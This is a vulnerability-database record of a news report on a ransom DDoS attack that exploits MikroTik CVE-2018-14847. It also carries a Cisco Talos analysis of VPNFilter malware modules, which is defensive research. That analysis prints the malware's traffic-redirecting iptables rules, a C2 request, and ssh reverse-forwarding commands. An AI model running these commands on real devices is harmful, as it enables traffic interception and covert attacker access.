DATABASE RESOURCES PRICING ABOUT US

{"id": "THN:0400E1C8B9BC8C15BAB8DE5F208A24BB", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "Imperva Thwarts 2.5 Million RPS Ransom DDoS Extortion Attacks", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEi461o-PUBEkGZMGabqSSoQD2B0HPpg9tATO2wonj81xGqlUFGjVbo1CpPG_pMgT8nKKSlY0K-ZTuIXRZUPbOZQ70CB5BSF-HjAXFY043bN-D1mpIGEdqD4SlgZs2LQQkuIxuzWn5hiYIhzm4GBvtbmZMnSkZ1C-R4cQL7YZ4P_ETLzNXfZsjwRYmzW>)\n\nCybersecurity company Imperva on Friday said it recently mitigated a ransom distributed denial-of-service (DDoS) attack targeting an unnamed website that peaked at 2.5 million requests per second (RPS).\n\n\"While ransom DDoS attacks are not new, they appear to be evolving and becoming more interesting with time and with each new phase,\" Nelli Klepfish, security analyst at Imperva, [said](<https://www.imperva.com/blog/imperva-mitigates-ransom-ddos-attack-measuring-2-5-million-requests-per-second/>). \"For example, we've seen instances where the ransom note is included in the attack itself embedded into a URL request.\"\n\nThe top sources of the attacks came from Indonesia, followed by the U.S., China, Brazil, India, Colombia, Russia, Thailand, Mexico, and Argentina.\n\nDistributed denial-of-service (DDoS) attacks are a subcategory of denial-of-service (DoS) attacks in which an army of connected online devices, known as a botnet, is used to overwhelm a target website with fake traffic in an attempt to render it unavailable to legitimate users.\n\nThe California-headquartered firm said that the affected entity received multiple ransom notes included as part of the DDoS attacks, demanding the company make a bitcoin payment to stay online and avoid losing \"hundreds of millions in market cap.\"\n\nIn an interesting twist, the attackers are calling themselves REvil, the infamous ransomware-as-a-service cartel that [suffered a major setback](<https://thehackernews.com/2022/01/russia-arrests-revil-ransomware-gang.html>) after a number of its operators were arrested by Russian law enforcement authorities earlier this January.\n\n\"It is not clear however whether the threats were really made by the original REvil group or by an imposter,\" Klepfish noted.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEj8toAElA1nFCf025htdOH8TwAvciuIz4ZS03MEWRgUxD37zdA_P9ILUSPopxSXx1TSHGfxGjYbslfMvIHiitsTUmpLAI3cRB715xxp9p-iOsXPHxx89Vos-N1CfU_OVIdrt8RCs4cF_T4ELs9mmdBwwIMTzoCzWlP2xanxACAYXEni8yy87xlBkay_>) \n--- \nAttack origins \n \nThe 2.5 million RPS attack is said to have lasted less than a minute, with one of the sister sites operated by the same company sustaining a similar attack that lasted approximately 10 minutes, even as the tactics employed were constantly changed to avert possible mitigation.\n\nEvidence gathered by Imperva points to the DDoS attacks originating from the [M\u0113ris botnet](<https://thehackernews.com/2021/12/over-300000-mikrotik-devices-found.html>), which has continued to leverage a now-addressed security vulnerability in Mikrotik routers ([CVE-2018-14847](<https://blog.mikrotik.com/security/winbox-vulnerability.html>)) to strike targets, including Yandex last September.\n\n\"The types of sites the threat actors are after appear to be business sites focusing on sales and communications,\" Klepfish said. \"Targets tend to be U.S.- or Europe-based with the one thing they all have in common being that they are all exchange-listed companies and the threat actors use this to their advantage by referring to the potential damage a DDoS attack could do to the company stock price.\"\n\nThe findings come as malicious actors have been spotted weaponizing a new amplification technique called [TCP Middlebox Reflection](<https://thehackernews.com/2022/03/hackers-begin-weaponizing-tcp-middlebox.html>) for the very first time in the wild to hit banking, travel, gaming, media, and web hosting industries with a flood of fake traffic.\n\nThe ransom DDoS attack is also the second botnet-related activity averted by Imperva since the start of the year, what with the company detailing a web scraping attack that targeted an unidentified job listing platform in late January.\n\n\"The attacker used a large-scale botnet, generating no less than 400 million bot requests from nearly 400,000 unique IP addresses over four days with the intent of harvesting job seekers' profiles,\" the security firm [said](<https://www.imperva.com/blog/imperva-mitigates-massive-bot-attack-of-400-million-requests/>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2022-03-05T07:53:00", "modified": "2022-03-06T06:47:13", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 6.4}, "severity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.2}, "href": "https://thehackernews.com/2022/03/imperva-thwarts-25-million-rps-ransom.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2018-14847"], "immutableFields": [], "lastseen": "2022-05-09T12:37:29", "viewCount": 65, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:39C8F377-0B4E-42DB-9730-672DE9671C8C"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0830"]}, {"type": "cisa", "idList": ["CISA:72D01121CAFBC56638BC974ABA539CF8"]}, {"type": "cve", "idList": ["CVE-2018-14847"]}, {"type": "exploitdb", "idList": ["EDB-ID:45209", "EDB-ID:45578"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:34440D2AB17F925EB3B4582B358E548F", "EXPLOITPACK:71B40F77201BD20B165A2CC309F0C281"]}, {"type": "hackread", "idList": ["HACKREAD:38EFBBF180E0993C3CC665D79BC0B551"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:941443220F7C778862BC45A189850EF6", "IMPERVABLOG:C35627F2B3AFD564AE9A15BFC7474967"]}, {"type": "kitploit", "idList": ["KITPLOIT:5494076556436489947"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1437FF0825AD10F9D61ABFE429326967"]}, {"type": "mmpc", "idList": ["MMPC:B4569A8CBDA7CA5A51F286861830C71B"]}, {"type": "mssecure", "idList": ["MSSECURE:B4569A8CBDA7CA5A51F286861830C71B"]}, {"type": "nessus", "idList": ["MIKROTIK_CVE_2018-14847.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310141279", "OPENVAS:1361412562310813155"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148958", "PACKETSTORM:149742"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:B6B5A95341EBF4792BAD1B887E8F35DC"]}, {"type": "talosblog", "idList": ["TALOSBLOG:744C774279644C0E2B83FB09F7352468"]}, {"type": "thn", "idList": ["THN:15F5633BC0BA0C82579744CCACA99558", "THN:31DAF3FB72A6AB73A54307C968C6570C", "THN:359CE3E905570B30722F914C18196DEB", "THN:B6838707858897EC6614B5E5C61FDE23", "THN:C96E59A0B083B41A78F431F292E7E1D5", "THN:EF8F680E8C0B204C481C9D7B5974A0A7"]}, {"type": "threatpost", "idList": ["THREATPOST:29B457A3AC4B513C7DA2C181E899EBBF", "THREATPOST:2E5940B4290E375F15EAA2246BBD6EFF", "THREATPOST:436D209F4CB01B99FC9576DFE08DE145", "THREATPOST:89FA3268B259F5D59A0211160BD3B700", "THREATPOST:AEFF18A46C45DA195E53C21BB6714562", "THREATPOST:E7D70D8CBF2F64521691B2DF2726498C"]}, {"type": "zdt", "idList": ["1337DAY-ID-31296"]}]}, "score": {"value": 0.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "mmpc", "idList": ["MMPC:B4569A8CBDA7CA5A51F286861830C71B"]}, {"type": "mssecure", "idList": ["MSSECURE:B4569A8CBDA7CA5A51F286861830C71B"]}, {"type": "threatpost", "idList": ["THREATPOST:E7D70D8CBF2F64521691B2DF2726498C"]}]}, "epss": [{"cve": "CVE-2018-14847", "epss": "0.974760000", "percentile": "0.999350000", "modified": "2023-03-17"}], "vulnersScore": 0.8}, "_state": {"dependencies": 1660004461, "score": 1684013406, "epss": 1679179052}, "_internal": {"score_hash": "a8e767444c9c01b8d60dd0b1576a4dd2"}}

{"attackerkb": [{"lastseen": "2023-07-15T20:25:44", "description": "MikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote authenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2018-08-02T00:00:00", "type": "attackerkb", "title": "CVE-2018-14847", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2020-06-05T00:00:00", "id": "AKB:39C8F377-0B4E-42DB-9730-672DE9671C8C", "href": "https://attackerkb.com/topics/oOoUGd0y46/cve-2018-14847", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "talosblog": [{"lastseen": "2018-10-05T08:22:15", "description": "## [](<http://4.bp.blogspot.com/-C9g9rcZel60/W6u9GJlOXgI/AAAAAAAAEEw/hYZ9vT-4Vhw5kPbPc21U12yoVRyRQIgTwCK4BGAYYCw/s1600/2018-09-26.jpg>)\n\n## Summary\n\n \nVPNFilter \u2014 [a multi-stage, modular framework](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>) that has infected hundreds of thousands of network devices across the globe \u2014 is now known to possess even greater capabilities. Cisco Talos recently discovered seven additional third-stage VPNFilter modules that add significant functionality to the malware, including an expanded ability to exploit endpoint devices from footholds on compromised network devices. The new functions also include data filtering and multiple encrypted tunneling capabilities to mask command and control (C2) and data exfiltration traffic. And while we believe our work, and the work of our international coalition of partners, has mostly neutralized the threat from VPNFilter, it can still be difficult to detect in the wild if any devices remain unpatched. \n \nTalos has been researching VPNFilter for months. Our initial findings are outlined [here](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>), and a description of additional modules used by the framework is [here](<https://blog.talosintelligence.com/2018/06/vpnfilter-update.html>). As part of our continued investigation, we developed a technique to examine a key protocol used by MikroTik networking devices to hunt for possible exploitation methods used by the actor. \n \nAs we followed the thread of VPNFilter infections, it became clear that MikroTik network devices were heavily targeted by the threat actor, especially in Ukraine. Since these devices seemed to be critical to the actor's operational goals, this led us to try to understand how they were being exploited. Part of our investigation included the study of the protocol used by MikroTik's Winbox administration utility. In this blog, we'll share how and why we studied this protocol, as well as the decoder tool we developed as a way of helping the security community look into this protocol for potential malicious actor activity. \n \nThe sophistication of VPNFilter drives home the point that this is a framework that all individuals and organizations should be tracking. Only an advanced and organized defense can combat these kinds of threats, and at the scale that VPNFilter is at, we cannot afford to overlook these new discoveries. \n \n \n\n\n## Expanded VPNFilter capabilities\n\n \nThe discovery of these additional VPNFilter third-stage modules has significantly added to our understanding of what we already knew to be an extremely potent threat. Together, these modules added: \n\n\n 1. Additional capabilities that could be leveraged to map networks and exploit endpoint systems that are connected to devices compromised by VPNFilter.\n 2. Multiple ways for the threat actor to obfuscate and/or encrypt malicious traffic, including communications used for C2 and data exfiltration.\n 3. Multiple tools that could be utilized to identify additional victims accessible from the actor's foothold on devices compromised by VPNFilter for both lateral movement within a network, as well as to identify new edge devices in other networks of interest to the actor.\n 4. The capacity to build a distributed network of proxies that could be leveraged in future unrelated attacks to provide a means of obfuscating the true source of attack traffic by making it appear as if the attacks originated from devices previously compromised by VPNFilter.\n \nWe were able to confirm the existence and capabilities of the malware after reverse-engineering these additional modules. Previously, we had to make analytic assessments on the existence and nature of these capabilities based solely on telemetry analysis, which always leaves room for error. \n \nFor example, we had previously noted what appeared to be devices compromised by VPNFilter conducting scans of large IP spaces that seemed focused on identifying other devices vulnerable to the methods of exploitation used by the actor associated with the VPNFilter malware. However, now we can discuss the specific third-stage module used for this activity. \n \nAs a result of our continued research, we have furthered our understanding of the full scope of the capabilities associated with VPNFilter after examining these additional third-stage modules. \n \n\n\n## Additional third-stage modules\n\n \nAs previously described, Talos identified the following seven additional third-stage modules that greatly expanded the capabilities present within VPNFilter. \n\n\n[](<https://4.bp.blogspot.com/-JdUaMCSMsJQ/W6uNrIDX3pI/AAAAAAAAAzA/U9yY81ZWztsh6ZyYItWhh_Tdj47kCloUgCLcBGAs/s1600/image4.png>)\n\nEach of these modules is described in detail in the following sections. \n \n\n\n### 'htpx' (endpoint exploitation module - executable injection)\n\n \n'htpx' is a third-stage module for VPNFilter. This module shares similar code with the 'ssler' module previously [documented](<https://blog.talosintelligence.com/2018/06/vpnfilter-update.html>) by Talos. The module relies heavily on open-source code that can be traced to the original projects based on strings present within the binary. A good example is '[libiptc.c](<https://git.netfilter.org/iptables/tree/libiptc/libiptc.c>)', which is part of Netfilter. \n\n\n[](<https://4.bp.blogspot.com/-QLSEAngfixo/W6uNxGUY_FI/AAAAAAAAAzE/Y5OL6cV6FVw1N0PBsY8LFKbdzWHagi_AQCLcBGAs/s1600/image3.jpg>)\n\n**Comparison of strings between 'htpx' (left) and 'ssler' (right). **\n\n \nThe primary function present within the 'htpx' module is responsible for setting up iptables rules to forward network traffic destined for TCP port 80 to a local server running on port 8888. This redirection is accomplished by first loading kernel modules that allow for traffic management. These modules (Ip_tables.ko, Iptable_filter.ko, and Iptable_nat.ko) are loaded with the insmod shell command. \n \nThe 'htpx' module then issues the following commands to surreptitiously forward traffic: \n \niptables -I INPUT -p tcp --dport 8888 -j ACCEPT \niptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8888 \n \nIt also periodically checks to ensure that these rules remain present by issuing similar delete commands then re-adding them. A temp file is also created called /var/run/htpx.pid. \n \nThe following HTTP request is then generated: \n \nGET %s HTTP/1.1\\r\\nHost: 103.6.146.194\\r\\nAccept: */*\\r\\nUser-Agent: curl53\\r\\n\\r\\n \n \nDuring our analysis of the 'htpx' module, we were unable to elicit a response from C2 infrastructure, so we were unable to observe additional module operations. During our analysis of the module binary, we identified that the module inspects HTTP communications to identify the presence of Windows executables. When they are encountered, the executable is flagged and added to a table. We assess with moderate confidence that this module could be leveraged by attackers to download a binary payload and allow for on-the-fly patching of Windows executables as they pass through compromised devices. \n \n\n\n### 'ndbr' (multi-functional SSH tool)\n\n \nThe 'ndbr' module is a module with SSH capabilities that also has the ability to port-scan other IPs. This module uses the dropbear SSH server and client and is a modified version of the [dbmulti](<https://github.com/mkj/dropbear/blob/master/dbmulti.c>) utility version 2017.75. We have identified several modifications to the standard dropbear functionality. \n \nThe first modifications are to the dbmulti utility itself. The typical utility can function as an SSH client, SSH server, perform data transfers using SCP, generate keys, or convert keys. The functionality is determined either by the program name or the first parameter passed to the program. The 'ndbr' module has replaced the ability to generate or convert keys with a network mapping (i.e., port-scanning) function as well as another function called 'ndbr.' \n \nLike the original \"dbmulti\" utility, the 'ndbr' module's functionality depends either on the name of the program or the first argument passed to the program. The arguments that the 'ndbr' module accepts are dropbear, dbclient, ssh, scp, ndbr, and nmap. A description of each of these arguments can be found in the following sections. \n \n\n\n#### dropbear\n\n \nThe dropbear command instructs the 'ndbr' module to operate as an SSH server. The original dropbear code uses the default SSH port (TCP/22) to listen for connections. However, the code present within the 'ndbr' module has been modified to use a default port of TCP/63914. Other modifications to the original dropbear code change the way that host keyfiles are handled. The default keyfile path has been changed to /db_key, but the 'ndbr' module does not drop this file. Instead, the buf_readfile dropbear function has been modified to load the proper key from memory when the filename parameter is equal to /db_key. \n \nInstead of using password-based authentication, the dropbear server has been modified to authenticate via a proper public key, which is also embedded in the 'ndbr' executable. A bug in this modified code mishandles connections attempting to use an incorrect public key. These authentication failures cause the ndbr SSH server to become stuck in an infinite loop. There is no indication to the client, however, that the authentication has failed. At this time, we have been unable to identify a correct key that would allow for successful authentication with the ndbr SSH server \u2014 neither of the keys embedded in the 'ndbr' module (i.e., /db_key and /cli_key) were correct, and no corresponding keys were found in any other VPNFilter-related binaries. \n \n\n\n#### dbclient (ssh)\n\n \nIf passed the dbclient or ssh parameter, the 'ndbr' module acts as the standard dropbear SSH command-line interface client but with modifications to its default options. As with the default keyfile with dropbear server command, the dbclient/ssh commands have a default identity file: /cli_key. At this time, we do not know what the dbclient (SSH client) is expected to connect to. \n \n\n\n#### nmap\n\n \nIf passed the nmap argument, the 'ndbr' module will perform a port scan of an IP or range of IPs. \n \nThe usage is: \n \nUsage %s -ip* &lt;ip-addr: 192.168.0.1/ip-range 192.168.0.0./24&gt; -p* &lt;port: 80/port-range: 25-125&gt; -noping &lt;default yes&gt; -tcp &lt;default syn&gt; -s &lt;source ip&gt; -h/--help (print this help) \n \n\n\n#### ndbr\n\n \nIf passed the ndbr argument, the 'ndbr' module will do one of three operations based on the other parameters it is passed. The SSH commands will make use of the default keys (i.e., /db_key and /cli_key) as described above. \n \nThe third parameter must begin with the word \"start,\" or the 'ndbr' module uninstalls itself. \n \nIf the ndbr module is executed using the following parameters: \n \n$ ./ndbr_&lt;arch&gt; ndbr &lt;param1&gt; &lt;param2&gt; \"start proxy &lt;host&gt; &lt;port&gt;\" \n \nThe following dropbear SSH command will be executed: \n \nssh -y -p &lt;port&gt; prx@&lt;host&gt; srv_ping j(&lt;B64 victim host name&gt;)_&lt;victim MAC address&gt; &lt;param2&gt; \n \nThis causes the dropbear SSH client to connect to a remote host and issue the \"srv_ping\" command, which is likely used to register the victim with a C2 server. \n \nIf the ndbr module is executed using the following parameters: \n \n`$ ./ndbr_&lt;arch&gt; ndbr &lt;param1&gt; &lt;param2&gt; \"start -l &lt;port&gt;\"` \n \nThe dropbear SSH server (as described above) is started and begins listening on the port specified: \n \n`sshd -p &lt;port&gt;` \n \nIf the ndbr module is executed with the following parameters: \n \n`$ ./ndbr_&lt;arch&gt; ndbr &lt;param1&gt; &lt;param2&gt; \"start &lt;user&gt; &lt;host&gt; &lt;port&gt;\"` \n \nRemote port forwarding is set up by executing the following dropbear command (see above for explanation of the command options): \n \n`ssh -N -T -y -p &lt;port&gt; -R :127.0.0.1:63914 &lt;user&gt;@&lt;host&gt;` \n \n\n\n### 'nm' (network mapper)\n\n \nThe 'nm' module is used to scan and map the local subnet. It iterates through all interfaces and starts by ARP scanning for all hosts on the subnet associated with each IP assigned to the interface. Once an ARP reply is received, nm will send an ICMP echo request to the discovered host. If an ICMP echo reply is received it will continue mapping by performing a port scan, trying to connect to the following remote TCP ports on the host: 9, 21, 22, 23, 25, 37, 42, 43, 53, 69, 70, 79, 80, 88, 103, 110, 115, 118, 123, 137, 138, 139, 143, 150, 156, 161, 190, 197, 389, 443, 445, 515, 546, 547, 569, 3306, 8080 or 8291. \n \nNext, it uses the MikroTik Network Discovery Protocol (MNDP) to locate any other MikroTik devices on the local network. If a MikroTik device replies to the MNDP ping, nm extracts the MAC address, system identity, version number, platform type, uptime in seconds, RouterOS software ID, RouterBoard model, and interface name from the discovered device. \n \nThe nm module looks in /proc/net/arp to get information about the infected device's ARP table, revealing the IP and MAC addresses of neighboring devices. Next, the entire contents of /proc/net/wireless are gathered. \n \nThe module performs a traceroute by first creating a TCP connection to 8.8.8.8:53 to confirm its availability (no data is sent), then ICMP echo requests are repeatedly sent to this IP with increasing TTLs. \n \nAll of the network information that is gathered is saved to a temporary file named /var/run/repsc_&lt;time stamp&gt;.bin. An example .bin file is as follows: \n\n\n[](<https://1.bp.blogspot.com/-C_k_GyYjAu4/W6uPw75omrI/AAAAAAAAAzc/Cq5CgWKzNEkRlRF1RdHzV2AqpKe45cVlQCLcBGAs/s1600/00001.jpg>)\n\nThe code responsible for the SSDP, CDP and LLDP functions was present within the module but was never called in the samples analyzed and therefore will always be empty. \n \nThe nm module requires three command line arguments to operate properly, but only the first parameter is used. Like several other modules, the first parameter is a folder, and this is the location where the data is permanently saved. The final task performed by the nm module is the moving of the temporary .bin file containing the results of the scan to a folder specified as the first command line argument, ostensibly for later exfiltration by the main VPNFilter process. \n \n\n\n### 'netfilter' (denial-of-service utility)\n\n \nnetfilter expects three arguments to be given on the command line. The first two arguments are unused, and the third argument is a quoted string in the format \"&lt;block/unblock&gt; &lt;# of minutes&gt;.\" '# of minutes' is how long netfilter should execute for before exiting. If 'block' was used as the first part of the third argument, netfilter adds the following rule to iptables: \n \nChain FORWARD (policy ACCEPT) \ntarget prot opt source destination \nDROP tcp -- anywhere anywhere tcpflags: PSH/PSH \n \nAfter adding this rule, netfilter waits 30 seconds and then deletes this rule. If there is still time remaining based on the '# of minutes' value, this process begins again. The addition and deletion loop ensures that the rule persists in the event the rule is deleted from the device. \n \nOnce the number of minutes has elapsed, the program exits. Signal handlers are also installed at the beginning of the netfilter program that deletes the iptables rule and then exit if the program receives either a SIGINT or SIGTERM. This is done so the device works as normal in the event someone manually terminates the netfilter program. \n \nFinally, the 'unblock' argument can be used to delete the iptables rule that was previously added using the 'block' argument. \n \nAlthough there are no other code paths possible, there are indications that there is or could have been something more to this module. \n \nThe first indicator is that all of the different netfilter module samples that Talos analyzed (MIPS, PPC, Tile-GX) contain the same list of 168 CIDR IP addresses and ranges which tie to the following companies/services: \n \n31.13.64.51 - WhatsApp \n169.44.36.0/25 - WhatsApp \n203.205.167.0/24 - Tencent (Owner of QQ Chat) \n52.0.0.0/16 - Amazon.com, Inc. (The following encrypted applications have used multiple IPs in this range: Wikr, Signal, Dust and Confide) \n \nThis indicates that the netfilter module may have been designed to deny access to specific forms of encrypted applications, possibly in an attempt to herd victim communications to a service that the actor preferred they use. Interestingly, Telegram, an extremely popular encrypted chat application, is missing from the list. \n \nHowever, we were unable to find any references to these strings in the code. All versions of netfilter that we have samples for have this same IP range list but do not appear to use it. It's possible that the samples we have are incomplete. \n \nThe iptables rule that is added by the netfilter module drops TCP packets with the PUSH flag set. This rule would likely use iptables rules that block all packets not just TCP packets with the PUSH flag set if its purpose is to provide attackers with the ability to launch denial-of-service attacks using compromised devices. Typically, a rule like this would be useful as part of a man-in-the-middle attack enabling attackers with access to the devices to intercept forwarded traffic, manipulate it, then manually forward it. This might explain the list of CIDR ranges as a list of IPs to intercept. We were unable to locate any indication of this sort of functionality present within the samples that were analyzed. \n \nWe have concluded that the IPs are not used. This may be due to them being left over from an older version of the netfilter module, functionality that has not yet been implemented, or there may be modifications to the statically linked iptables library made by the malware authors that we haven't found yet. The VPNFilter authors have modified open-source code before (e.g. the ndbr module), so it's not unexpected that they would change the libiptc code linked in the netfilter module. \n \n\n\n### 'portforwarding' (Allows the forwarding of network traffic to attacker specified infrastructure)\n\n \nThe portforwarding module is designed to be executed with the following command line arguments: \n \n./portforwarding &lt;unused&gt; &lt;unused&gt; \"start &lt;IP1&gt; &lt;PORT1&gt; &lt;IP2&gt; &lt;PORT2&gt;\" \n \nGiven these arguments, the portforwarding module will forward traffic from a particular port and IP combination to another port and IP by installing the following iptables rules: \n \niptables -t nat -I PREROUTING 1 -p tcp -m tcp -d &lt;IP1&gt; \\--dport &lt;PORT1&gt; -j DNAT --to-destination &lt;IP2&gt;:&lt;PORT2&gt; \n \niptables -t nat -I POSTROUTING 1 -p tcp -m tcp -d &lt;IP2&gt; \\--dport &lt;PORT2&gt; -j SNAT --to-source &lt;device IP&gt; \n \nThese rules cause any traffic passing through the infected device that is destined to IP1:PORT1 to be redirected to IP2:PORT2 instead. The second rule then changes the source address of the rerouted traffic to that of the infected device to ensure the responses are sent back to the infected device. \n \nAs a precaution, before installing the iptables rules, the portforwarding module first checks that IP2 is available by creating a socket connection to IP2 on PORT2. However, no data is sent before the socket is closed. \n \nLike other modules that manipulate iptables, the portforwarding module enters a loop that adds the rules, waits a period of time, deletes the rules and then adds them again to ensure that the rules persist on the device even if they are manually deleted. \n \n\n\n### 'socks5proxy' (Enables establishment of a SOCKS5 proxy on compromised devices)\n\n \nThe socks5proxy module is a SOCKS5 proxy server that appears to be based on the open-source project [shadowsocks](<https://shadowsocks.org/en/index.html>). The server uses no authentication and is hardcoded to listen on TCP port 5380. Before the server is started, socks5proxy forks to connect to a C2 server specified in arguments supplied to the module. If the server does not respond within a few seconds, the fork kills its parent process (the server) and then exits. The C2 server can respond with commands to execute normally or terminate the server. \n \nThis module contains the following usage strings, though they do not line up with the arguments for the socks5proxy module, and these settings cannot be modified through command line arguments: \n \nssserver \n \\--username &lt;username&gt; username for auth \n \\--password &lt;password&gt; password for auth \n -p, --port &lt;port&gt; server port, default to 1080 \n -d run in daemon \n \\--loglevel &lt;level&gt; log levels: fatal, error, warning, info, debug, trace \n -h, --help help \n \nThe actual command line arguments for the socks5proxy module are: \n \n./socks5proxy &lt;unused&gt; &lt;unused&gt; \"start &lt;C&amp;C IP&gt; &lt;C&amp;C port&gt;\" \n \nThe socks5proxy module verifies the argument count is greater than 1, but the process crashes with a SIGSEV signal if two arguments are given, indicating that there may be limited or poor quality control during some phases of development for this malware toolchain. \n \n\n\n### 'tcpvpn' (Enables establishment of a Reverse-TCP VPN on compromised devices)\n\n \nThe tcpvpn module is a Reverse-TCP VPN, designed to allow a remote attacker to access internal networks behind infected devices. It accomplishes this by beaconing to a remote server, which could be set up like a TunTap device to forward packets over the TCP connection. The connection is seen as outbound by network devices, which may help the module bypass simple firewalls or NAT issues. This module is similar in concept to penetration testing software Cobalt Strike's [VPN Pivoting](<https://www.cobaltstrike.com/help-covert-vpn>). \n \nAll data sent through the connection is encrypted with RC4, with a key generated by the hardcoded bytes: \n \n\n \n \n \"213B482A724B7C5F4D77532B45212D215E79433D794A54682E6B653A56796E457A2D7E3B3A2D513B6B515E775E2D7E533B51455A68365E6A67665F34527A7347\"\n\n \nWhich are sandwiched between the port numbers of the current connection (e.g., \"58586!;H*rK|_MwS+E!-!^yC=yJTh.ke:VynEz-~;:-Q;kQ^w^-~S;QEZh6^jgf_4RzsG80\"). \n \nThe command line syntax associated with the tcpvpn module are: \n \n./tcpvpn &lt;unused&gt; &lt;unused&gt; \"start &lt;C&amp;C IP&gt; &lt;C&amp;C port&gt;\" \n \n\n\n### MikroTik Research\n\n \n\n\n### Introducing the Winbox Protocol Dissector\n\n \nDuring our research into VPNFilter, we needed to determine how some of the devices were compromised. While examining the MikroTik series of devices, we noticed an open port (TCP 8291) and that the configuration tool \"Winbox\" uses that port for communication. \n \nThe traffic from these devices appeared as large blobs of binary data, so we weren't able to determine potential avenues of access using this protocol without a protocol dissector (which to our knowledge, didn't exist publicly). We decided to develop our protocol dissector for use with packet analysis tools such as [Wireshark](<https://www.wireshark.org/>) to learn more about the protocol, which would allow us to design effective rules to prevent future infections once potential attack vectors were discovered. \n \nAn example of such an attack vector is [CVE-2018-14847](<https://arstechnica.com/information-technology/2018/09/unpatched-routers-being-used-to-build-vast-proxy-army-spy-on-networks/>) which allows an attacker to perform a directory traversal for unauthenticated credential recovery. The dissector proved extremely helpful when we wrote coverage for this vulnerability ([Snort SID: 47684](<https://www.snort.org/advisories/598>)). While an [update](<https://blog.mikrotik.com/security/winbox-vulnerability.html>) for this vulnerability has been released, we think it's essential for security professionals to be able to monitor this traffic to help identify any other potentially malicious traffic. \n \nPrivacy can still be maintained by ensuring that you either use \"secure mode\" to encrypt communications or download the latest Winbox client which communicates over encrypted channels only. This tool will **NOT** decrypt encrypted communications. The latest MikroTik CCR firmware version we tested (6.43.2), enforces the usage of this newer Winbox client though this is only enforced client-side. This means that you **CAN** still communicate over insecure channels using a custom-made client. Therefore, we believe this Wireshark dissector remains useful because an attacker can still deliver an exploit without having to reimplement said secure communications. \n \n\n\n### What is the \"Winbox Protocol?\"\n\n \nThe term \"Winbox\" comes from the Winbox client offered by MikroTik as an alternative to the web GUI. \n \nFrom the official [documentation](<https://wiki.mikrotik.com/wiki/Manual:Winbox>), Winbox is a small utility that allows for the administration of MikroTik RouterOS using a fast and simple GUI. It is a native Win32 binary but can be run on Linux and MacOS (OSX) using Wine, an open-source compatibility layer. All Winbox interface functions are as close as possible to mirroring the console functions \u2014 that is why there are no Winbox sections in the manual. Some of the advanced and critical system configurations are not possible from Winbox, like changing the MAC address on an interface. \n \nThe term \"Winbox Protocol\" is not official, as far as we know. It's simply the term we chose since it matches the name of their client. \n \n\n\n### Using the dissector\n\n \nInstallation is simple, and since this is a LUA-based dissector, recompilation is not necessary. Simply drop the Winbox_Dissector.lua file into your /$HOME/.wireshark/plugins folder. By default, any TCP traffic to or from TCP port 8291 will be properly decoded as Winbox traffic once the dissector is installed. \n \nWhile a single message from the client/server to its destination would be preferable for parsing purposes, this is not always the case and observing live communications proved that there are many ways that Winbox messages can be formatted and sent. \n \nBelow is an example of a Winbox communications capture that has the following 